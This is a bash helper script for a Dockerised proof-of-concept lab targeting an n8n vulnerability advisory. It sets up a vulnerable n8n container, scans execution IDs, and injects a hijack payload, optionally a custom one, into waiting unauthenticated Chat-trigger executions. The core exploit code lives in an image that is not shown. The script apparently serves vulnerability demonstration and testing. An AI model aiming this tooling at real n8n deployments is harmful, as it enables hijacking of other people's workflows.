#!/usr/bin/env bash # ────────────────────────────────────────────────────────────────────────────── # exploit.sh — one-shot helper for GHSA-f77h-j2v7-g6mw # # Usage: # ./exploit.sh setup # pull images, build PoC, start n8n target # ./exploit.sh scan # scan exec IDs 1-200 with default payload # ./exploit.sh scan 1 500 # scan a custom range # ./exploit.sh attack # attack a specific execution ID # ./exploit.sh attack "custom payload" # ./exploit.sh logs # tail n8n target logs # ./exploit.sh clean # stop & remove everything # ────────────────────────────────────────────────────────────────────────────── set -euo pipefail TARGET_INTERNAL="http://n8n-vuln:5678" TARGET_LOCAL="http://localhost:5678" DEFAULT_PAYLOAD="[CVE-2026-42228] hijacked by PoC" usage() { grep '^#' "$0" | grep -v '#!/' | sed 's/^# \?//' exit 1 } require() { command -v "$1" &>/dev/null || { echo "[!] '$1' not found in PATH"; exit 1; } } require docker cmd="${1:-}" case "$cmd" in setup) echo "[*] Pulling vulnerable n8n image (1.123.22) ..." docker compose pull n8n-vuln echo "[*] Building attacker image ..." docker compose build poc echo "[*] Starting vulnerable n8n target ..." docker compose up -d n8n-vuln echo "" echo "[*] Waiting for n8n to become healthy ..." until docker inspect --format='{{.State.Health.Status}}' n8n-vuln 2>/dev/null | grep -q healthy; do printf '.' sleep 2 done echo "" echo "[+] n8n is up at $TARGET_LOCAL" echo "" echo " Next steps:" echo " 1. Open $TARGET_LOCAL and complete the setup wizard" echo " 2. Create a workflow with a Chat trigger node" echo " 3. Set the Chat trigger Auth = None and activate the workflow" echo " 4. Open the Chat and send a message to put the execution in 'waiting' state" echo " 5. Run: ./exploit.sh scan" ;; scan) START="${2:-1}" END="${3:-200}" echo "[*] Scanning execution IDs $START → $END against $TARGET_INTERNAL" docker compose run --rm poc \ --target "$TARGET_INTERNAL" \ --start-id "$START" \ --end-id "$END" \ --inject "$DEFAULT_PAYLOAD" ;; attack) EXEC_ID="${2:?'Usage: ./exploit.sh attack [payload]'}" PAYLOAD="${3:-$DEFAULT_PAYLOAD}" echo "[*] Attacking execution $EXEC_ID ..." docker compose run --rm poc \ --target "$TARGET_INTERNAL" \ --exec-id "$EXEC_ID" \ --inject "$PAYLOAD" ;; logs) docker compose logs -f n8n-vuln ;; clean) echo "[*] Stopping and removing lab containers, network, and volumes ..." docker compose down -v echo "[+] Done." ;; *) usage ;; esac